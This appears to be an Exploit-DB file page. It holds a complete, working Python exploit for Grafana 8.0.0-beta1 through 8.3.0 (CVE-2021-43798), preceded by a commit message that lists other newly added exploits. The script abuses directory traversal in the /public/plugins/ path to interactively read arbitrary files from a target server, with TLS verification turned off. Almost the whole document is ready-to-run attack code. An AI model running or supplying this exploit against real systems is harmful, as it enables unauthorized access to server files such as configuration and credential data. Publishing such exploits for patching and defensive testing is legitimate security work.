c906261f2c
11 changes to exploits/shellcodes MTPutty 1.0.1.21 - SSH Password Disclosure Raspberry Pi 5.10 - Default Credentials Chikitsa Patient Management System 2.0.2 - 'plugin' Remote Code Execution (RCE) (Authenticated) Chikitsa Patient Management System 2.0.2 - 'backup' Remote Code Execution (RCE) (Authenticated) LimeSurvey 5.2.4 - Remote Code Execution (RCE) (Authenticated) TestLink 1.19 - Arbitrary File Download (Unauthenticated) Student Management System 1.0 - SQLi Authentication Bypass Wordpress Plugin Catch Themes Demo Import 1.6.1 - Remote Code Execution (RCE) (Authenticated) Grafana 8.3.0 - Directory Traversal and Arbitrary File Read Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass Employees Daily Task Management System 1.0 - 'multiple' Cross Site Scripting (XSS)
104 lines
No EOL
2.7 KiB
Python
Executable file
104 lines
No EOL
2.7 KiB
Python
Executable file
# Exploit Title: Grafana 8.3.0 - Directory Traversal and Arbitrary File Read
|
|
# Date: 08/12/2021
|
|
# Exploit Author: s1gh
|
|
# Vendor Homepage: https://grafana.com/
|
|
# Vulnerability Details: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
|
|
# Version: V8.0.0-beta1 through V8.3.0
|
|
# Description: Grafana versions 8.0.0-beta1 through 8.3.0 is vulnerable to directory traversal, allowing access to local files.
|
|
# CVE: CVE-2021-43798
|
|
# Tested on: Debian 10
|
|
# References: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p47p
|
|
|
|
#!/usr/bin/env python3
|
|
# -*- coding: utf-8 -*-
|
|
|
|
import requests
|
|
import argparse
|
|
import sys
|
|
from random import choice
|
|
|
|
plugin_list = [
|
|
"alertlist",
|
|
"annolist",
|
|
"barchart",
|
|
"bargauge",
|
|
"candlestick",
|
|
"cloudwatch",
|
|
"dashlist",
|
|
"elasticsearch",
|
|
"gauge",
|
|
"geomap",
|
|
"gettingstarted",
|
|
"grafana-azure-monitor-datasource",
|
|
"graph",
|
|
"heatmap",
|
|
"histogram",
|
|
"influxdb",
|
|
"jaeger",
|
|
"logs",
|
|
"loki",
|
|
"mssql",
|
|
"mysql",
|
|
"news",
|
|
"nodeGraph",
|
|
"opentsdb",
|
|
"piechart",
|
|
"pluginlist",
|
|
"postgres",
|
|
"prometheus",
|
|
"stackdriver",
|
|
"stat",
|
|
"state-timeline",
|
|
"status-histor",
|
|
"table",
|
|
"table-old",
|
|
"tempo",
|
|
"testdata",
|
|
"text",
|
|
"timeseries",
|
|
"welcome",
|
|
"zipkin"
|
|
]
|
|
|
|
def exploit(args):
|
|
s = requests.Session()
|
|
headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.' }
|
|
|
|
while True:
|
|
file_to_read = input('Read file > ')
|
|
|
|
try:
|
|
url = args.host + '/public/plugins/' + choice(plugin_list) + '/../../../../../../../../../../../../..' + file_to_read
|
|
req = requests.Request(method='GET', url=url, headers=headers)
|
|
prep = req.prepare()
|
|
prep.url = url
|
|
r = s.send(prep, verify=False, timeout=3)
|
|
|
|
if 'Plugin file not found' in r.text:
|
|
print('[-] File not found\n')
|
|
else:
|
|
if r.status_code == 200:
|
|
print(r.text)
|
|
else:
|
|
print('[-] Something went wrong.')
|
|
return
|
|
except requests.exceptions.ConnectTimeout:
|
|
print('[-] Request timed out. Please check your host settings.\n')
|
|
return
|
|
except Exception:
|
|
pass
|
|
|
|
def main():
|
|
parser = argparse.ArgumentParser(description="Grafana V8.0.0-beta1 - 8.3.0 - Directory Traversal and Arbitrary File Read")
|
|
parser.add_argument('-H',dest='host',required=True, help="Target host")
|
|
args = parser.parse_args()
|
|
|
|
try:
|
|
exploit(args)
|
|
except KeyboardInterrupt:
|
|
return
|
|
|
|
|
|
if __name__ == '__main__':
|
|
main()
|
|
sys.exit(0) |